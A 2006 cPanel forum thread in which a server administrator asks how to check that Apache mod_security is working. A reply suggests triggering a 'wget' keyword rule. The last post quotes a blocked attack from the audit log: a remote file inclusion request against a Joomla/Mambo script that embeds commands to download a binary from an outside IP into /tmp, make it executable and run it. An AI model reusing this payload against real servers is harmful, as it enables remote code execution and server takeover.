Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

testing mod_security

Discussion in 'Security' started by embsupafly, Mar 9, 2006.

  1. embsupafly

    embsupafly Active Member

    Joined:
    Dec 24, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    156
    I installed the mod_security module for apache and added a few example rulesets shared on this forum. Apache started ok when I was done and I did a config test and everything was ok. I tailed /use/local/apache/logs/audit_log and nothing is showing up, there is actually nothing in the file. Does this mean there are no attacks yet? How can I simulate an attack to ensure that this is working ok?
     
  2. webignition

    webignition Well-Known Member

    Joined:
    Jan 22, 2005
    Messages:
    1,880
    Likes Received:
    0
    Trophy Points:
    166
    The only way to be 100% sure that your rulesets are doing what they should is by checking each rule individually and trying to do something so that the rule is invoked - what this is depends entirely on the rule.

    However if you want to test things in general, try finding a rule that relates to something in appropriate in a GET request - i.e. something bad in the URL.

    For example of you have a rule that blocks requests with 'wget' in the URL, try visiting http://www.example.com/?wget and you should notice mod_sec blocking the request.

    If I remember correctly, the audit log is not updated in real time (I might be wrong), so don't expect anything in there immediately.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    6
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  4. embsupafly

    embsupafly Active Member

    Joined:
    Dec 24, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    156
    What were the attackers trying to do here?

    Code:
    Request: ***.***.com 82.185.246.179 - - [09/Mar/2006:04:33:41 -0500] "GET /index2.php?option=com_conten
    t&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.14
    4/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo|  HTTP/1.1" 403 426 "-" "Mo
    zilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-"
    ----------------------------------------
    GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_
    absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY
    ;echo|  HTTP/1.1
    Host: **.**.***.***
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
    mod_security-message: Access denied with code 403. Pattern match "wget " at THE_REQUEST
    mod_security-action: 403
    
    HTTP/1.1 403 Forbidden
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
    --65e08270--
    
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice